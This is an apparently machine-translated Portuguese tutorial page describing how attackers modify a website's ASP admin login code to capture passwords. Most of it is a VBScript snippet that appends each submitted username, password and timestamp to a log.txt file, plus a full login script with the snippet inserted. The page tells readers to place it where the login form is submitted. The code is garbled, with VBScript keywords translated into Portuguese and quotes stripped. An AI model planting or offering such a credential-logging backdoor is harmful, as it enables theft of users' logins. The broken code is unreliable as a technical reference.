Página Inicial>Tutorial de programação de redes>Tutorial ASP

Asp intercepta o código da senha de login em segundo plano

Autor:Eve Cole Data da Última Atualização:2025-03-13 13:00:04

Muitos hackers obtêm a senha de login do usuário do site de destino modificando o código de login em segundo plano, para que, assim que inserirmos a senha, ela seja salva em um txt.

O código é o seguinte:

definir fso=server.createobject(scripting.filesystemobject)

se fso.FileExists(server.mappath(log.txt))=true então

definir fin=fso.OpenTextFile(server.mappath(log.txt))

temp=fin.readall

fin.fechar

definir fin = nada

terminar se

definir fout=fso.createtextfile(server.mappath(log.txt))

fout.WriteLine(temp&usuário:&nomedeusuário&¦pwd:&senha&¦hora:&agora()&)

fout.fechar

set fout = nada

definir fso = nada

Insira-o onde o formulário é enviado no login em segundo plano!

Documentos de referência:

Copie o código do código da seguinte forma:

<%@idioma=página de código vbscript=936%>

<%

dimsql,rs

dim nome de usuário, senha, CheckCode

nome de usuário=substituir(trim(solicitação(nome de usuário)),',)

senha=substituir(trim(Solicitação(senha)),',)

CheckCode = substituir(trim(Request(CheckCode)),',)

se NomeUsuário = então

FoundErr = Verdadeiro

ErrMsg=ErrMsg & <br><li>O nome de usuário não pode ficar vazio! </li>

terminar se

se senha = então

FoundErr = Verdadeiro

ErrMsg=ErrMsg & <br><li>A senha não pode estar vazia! </li>

terminar se

se CheckCode = então

FoundErr = Verdadeiro

ErrMsg=ErrMsg & <br><li>O código de verificação não pode estar vazio! </li>

terminar se

se sessão(CheckCode)=então

FoundErr = Verdadeiro

ErrMsg=ErrMsg & <br><li>Seu tempo de login é muito longo, retorne à página de login para fazer login novamente. </li>

terminar se

se CheckCode<>CStr(sessão(CheckCode)) então

FoundErr = Verdadeiro

ErrMsg=ErrMsg & <br><li>O código de confirmação que você digitou é inconsistente com o gerado pelo sistema, digite-o novamente. </li>

terminar se

'Atrás deste está o código que adicionei ~ a área inicial

definir fso=server.createobject(scripting.filesystemobject)

se fso.FileExists(server.mappath(log.txt))=true então

definir fin=fso.OpenTextFile(server.mappath(log.txt))

temp=fin.readall

fin.fechar

definir fin = nada

terminar se

definir fout=fso.createtextfile(server.mappath(log.txt))

fout.WriteLine(temp&usuário:&nomedeusuário&|pwd:&senha&|tempo:&agora()&)

fout.fechar

set fout = nada

definir fso = nada

'O código por trás foi deletado por mim~área final

%>

Artigos Relacionados